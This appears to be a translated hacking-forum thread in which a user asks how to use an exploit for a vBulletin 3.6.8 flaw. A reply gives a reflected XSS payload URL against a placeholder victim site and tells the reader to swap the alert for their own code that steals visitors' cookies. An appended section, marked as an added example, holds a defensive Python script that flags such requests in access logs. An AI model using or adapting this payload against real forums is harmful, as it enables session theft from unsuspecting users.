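Guys, I want an explanation of how to exploit this vulnerability. Peace be upon you, and the mercy and blessings of God. It's true that I got the exploit for the vulnerability, but I couldn't figure out how to use it. This is the link to the vulnerability: http://www.securityfocus.com/archive/1/476924 Waiting for an answer. Regards.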
This vulnerability has several possible forms.
We'll try this exploit: http://www.Victim.com/vBulletin V3.6.8/index.php?s=< s c r i p t >a l e r t( ' d o c u m e n t . c o o k i e ' ) < / s c r i p t>
This is an exploit for an XSS vulnerability. This vulnerability steals the victim's cookies. So what do you do? You change:
http://www.Victim.com/ : the victim's site
vBulletin V3.6.8 : the forum directory, which is usually like this: /vb
< s c r i p t >a l e r t( ' d o c u m e n t . c o o k i e ' ) < / s c r i p t : here you put your own code that steals the cookies
But I advise you to go through the vulnerability discovery course.
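Added example, not part of the original thread: a log-triage check a forum administrator could run to spot requests of the shape discussed above, where the `s` parameter or another query parameter carries markup instead of a session value. The log lines are constructed, and the rule that a legitimate `s` value is empty or a 32-character hex hash is an assumption, as are all function names.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Assumption: a legitimate "s" value is empty or a 32-character hex session hash.
SESSION_HASH = re.compile(r"[0-9a-f]{32}", re.IGNORECASE)
MARKUP = re.compile(r"[<>]")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded markup (%253C) is seen."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(log_line):
    """Return sorted (parameter, reason) pairs for one access-log line."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    query = urlsplit(match.group(1)).query
    findings = set()
    # parse_qsl decodes once; fully_decode handles any further encoding layers.
    for name, raw in parse_qsl(query, keep_blank_values=True):
        value = fully_decode(raw)
        if name == "s" and value and not SESSION_HASH.fullmatch(value):
            findings.add((name, "not a session hash"))
        if MARKUP.search(value):
            findings.add((name, "markup characters"))
    return sorted(findings)

# Constructed sample lines (documentation IP range, placeholder timestamps).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /vb/index.php?s=0123456789abcdef0123456789abcdef HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /vb/index.php?s=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5200',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /vb/faq.php?s=&do=search&q=%22%3E%3C%2Fscript%3E&match=all HTTP/1.1" 200 4800',
    '203.0.113.9 - - [01/Jan/2024:10:00:12 +0000] "GET /vb/index.php?s=%253Cb%253E HTTP/1.1" 200 5100',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(suspicious_params(line), line.split('"')[1])
```

A hit here only means the request is worth reviewing; whether the page actually reflects the value unescaped depends on the installed version and its patches.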
[ vBspiders.Com Network ]